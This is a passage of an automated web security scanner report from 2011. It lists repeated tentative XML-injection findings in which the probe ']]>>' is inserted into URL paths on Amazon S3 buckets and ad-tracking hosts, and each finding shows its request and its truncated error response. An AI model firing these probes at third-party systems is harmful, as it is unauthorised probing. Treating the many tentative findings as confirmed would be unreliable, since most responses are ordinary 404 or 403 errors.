Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: A014D6BAD04CBBAF
x-amz-id-2: D/CYufhjkKsTnMteLpcVsw1/FlIRMIzo6PzDtuY+sKfNbfjTa+2hGHF07JRJ69QP
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:10 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>A014D6BAD
...[SNIP]...

8.42. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17660/AP110429160259.jpg?1305423494 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: AE84370B8E34005F
x-amz-id-2: MBgrrUzcbkebBpKUCPjGvRC2c1IrOUpshJvgzClQpHyIJCOTh17CXRqQ/da0T1bJ
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AE84370B8E34005F</RequestId><HostId>MBgrrUzcbkebBpKUCPjGvRC2c1IrOUpshJvgzClQpHyIJCOTh1
...[SNIP]...

8.43. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17660]]>>/AP110429160259.jpg?1305423494 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: EB05BE6220311CE2
x-amz-id-2: l1Ur6kFB5IDYQ4utheDQ1ooawbATy62d3NEt0xjmGPl3+Dle6B+YY/eV6cIQBAe/
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EB05BE6220311CE2</RequestId><HostId>l1Ur6kFB5IDYQ4utheDQ1ooawbATy62d3NEt0xjmGPl3+Dle6B
...[SNIP]...

8.44. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg]]>>?1305423494 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: AFB02C276AF74B58
x-amz-id-2: hrDGigOFKHMo+AViazAO8kPOJgITbJ8YYx2DeHKtp6oC2298aDWSD/gvJXSo+G2+
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:17 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AFB02C276AF74B58</RequestId><HostId>hrDGigOFKHMo+AViazAO8kPOJgITbJ8YYx2DeHKtp6oC2298aD
...[SNIP]...

8.45. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17661/AP11050105364.jpg?1305423674 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 89D4D42895CDB5B7
x-amz-id-2: qrtgZ0rfX4uCSRClaqcutwZKQExxw6kCUi/00RC0oRyuJpd9mm5wEORNwTvZFQQt
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:09 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>89D4D4289
...[SNIP]...

8.46. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17661/AP11050105364.jpg?1305423674 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 4CB01F845ECE70E3
x-amz-id-2: a3+ztgmqZnVE7ebfUULnk+kl5FeTlfDTpVB5n4mFDdOLTIkeZcQvcOJGM+Ire6pY
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4CB01F845ECE70E3</RequestId><HostId>a3+ztgmqZnVE7ebfUULnk+kl5FeTlfDTpVB5n4mFDdOLTIkeZc
...[SNIP]...

8.47. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17661]]>>/AP11050105364.jpg?1305423674 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: EE42AD55490EB5B4
x-amz-id-2: /7Jq5JDokx6p3t4BpTo4qI4qN3fPDsLKXZxzJuyxskIhtaSrTyUUCsmM5eZ62cS1
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE42AD55490EB5B4</RequestId><HostId>/7Jq5JDokx6p3t4BpTo4qI4qN3fPDsLKXZxzJuyxskIhtaSrTy
...[SNIP]...

8.48. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg]]>>?1305423674 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: CC592AEA8352786D
x-amz-id-2: nFqe66XBjQ10L3fZwT1KcIf+1THxsnJo/1+Da13ClPQg0kfW48gxw2crVv1uhJxt
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:15 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CC592AEA8352786D</RequestId><HostId>nFqe66XBjQ10L3fZwT1KcIf+1THxsnJo/1+Da13ClPQg0kfW48
...[SNIP]...

8.49. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17665/AP110514120499.jpg?1305429079 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: C7741386D4BE1B82
x-amz-id-2: f8dZyKIh4mi8zxPOp6DxkP9VUPEMME9lRzVXOk9EnYaf4saf4L6N7Oa8wQ5Gl/oj
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:08 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>C7741386D
...[SNIP]...

8.50. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17665/AP110514120499.jpg?1305429079 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1608602CA911B023
x-amz-id-2: APWsURpKnFDCnk3D1wzZaZos3WTexy4qbWUgJl7WUazBsu5y/Ofri7xWxF+DnYWE
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:10 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1608602CA911B023</RequestId><HostId>APWsURpKnFDCnk3D1wzZaZos3WTexy4qbWUgJl7WUazBsu5y/O
...[SNIP]...

8.51. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17665]]>>/AP110514120499.jpg?1305429079 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 238C40A298BAF1B2
x-amz-id-2: KSTh9o2Hi0yX7ZrEElh25Qx2IqDB7sTPIr+S8NHmVJtbCYzyAuiH8n7AzmV3MkV5
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:11 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>238C40A298BAF1B2</RequestId><HostId>KSTh9o2Hi0yX7ZrEElh25Qx2IqDB7sTPIr+S8NHmVJtbCYzyAu
...[SNIP]...

8.52. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg]]>>?1305429079 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: BE53E5BFF6C5DD45
x-amz-id-2: RpNbCEi15NVZj+XP05N6nXzBKmAOJUHEL5er1BAkCjMgnB/aHI5ddjJn12+IWzfT
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BE53E5BFF6C5DD45</RequestId><HostId>RpNbCEi15NVZj+XP05N6nXzBKmAOJUHEL5er1BAkCjMgnB/aHI
...[SNIP]...

8.53. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17680/AP_posada.jpg?1305436464 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 061F07AA51AE5B45
x-amz-id-2: BgifvUsj8gbWtiV6YslMbq1DjvmC225a2u+dG+KiDYXJA2XoK731ctcReNIc5KpF
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>061F07AA5
...[SNIP]...

8.54. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17680/AP_posada.jpg?1305436464 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 0C5AFFFEC52D5EAD
x-amz-id-2: H5iivuAiX31/RJhiw1VSD6OkyTJuux4bAQ4Ro/CEhw68NWq/FvAWnvK134CdRlcx
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:15 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0C5AFFFEC52D5EAD</RequestId><HostId>H5iivuAiX31/RJhiw1VSD6OkyTJuux4bAQ4Ro/CEhw68NWq/Fv
...[SNIP]...

8.55. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17680]]>>/AP_posada.jpg?1305436464 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 02143E619715AB5F
x-amz-id-2: aEpILhy6wy1S5eg3kAciyB9Bqlu2WMdvbl3+5tkX2OaBv+hIcJLyHyGYjuLLK/I5
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:15 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>02143E619715AB5F</RequestId><HostId>aEpILhy6wy1S5eg3kAciyB9Bqlu2WMdvbl3+5tkX2OaBv+hIcJ
...[SNIP]...

8.56. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg]]>>?1305436464 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: E6A7BD1FFBA22478
x-amz-id-2: h6EEI7o05c+HPpfFe6cfeXCdcgVnIL3dV9/rakUXQZL0FIOJbBt6F/FMfyaXS2L/
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E6A7BD1FFBA22478</RequestId><HostId>h6EEI7o05c+HPpfFe6cfeXCdcgVnIL3dV9/rakUXQZL0FIOJbB
...[SNIP]...

8.57. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/Tracer.js?user=aH4rgeyDqr35CXadbi-bpO HTTP/1.1
Host: tcr.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=1800
Content-Type: text/html
Date: Sun, 15 May 2011 20:02:29 GMT
Expires: Sun, 15 May 2011 20:32:29 GMT
Server: EOS (lax001/54F8)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.58. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts/Tracer.js]]>>?user=aH4rgeyDqr35CXadbi-bpO HTTP/1.1
Host: tcr.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=1800
Content-Type: text/html
Date: Sun, 15 May 2011 20:02:33 GMT
Expires: Sun, 15 May 2011 20:32:34 GMT
Server: EOS (lax001/54D7)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.59. http://trk.cetrk.com/s [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://trk.cetrk.com
Path:   /s

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /s]]>>?146645&1305489679&AACxAwCAsYMDAAAAABwCaAEZc2VsZWN0ZWRfZXZlbnRfaW1hZ2VfbGluawBUdHdlZXRiZWF0LmNvbS9ldmVudHMvMTc2MTItbWVtcGhpcy1ncml6emxpZXMtb2tsYWhvbWEtY2l0eS10aHVuZGVyLWdhbWUtNz9tcWhvbT1tYW5pVHR3ZWV0YmVhdC5jb20vZXZlbnRzLzE3NjEyLW1lbXBoaXMtZ3JpenpsaWVzLW9rbGFob21hLWNpdHktdGh1bmRlci1nYW1lLTc_bXFob209bWFuaRRzZWxlY3RlZF9ldmVudF9pbWFnZQ HTTP/1.1
Host: trk.cetrk.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1CD65E5EA0829312
x-amz-id-2: f8qBMqCIxhvl+G+aGphUQEbhL8KMAu6I1Z6xXWRbxLX1idZlkl8EcT+tT+H333Vh
Content-Type: application/xml
Date: Sun, 15 May 2011 20:04:44 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
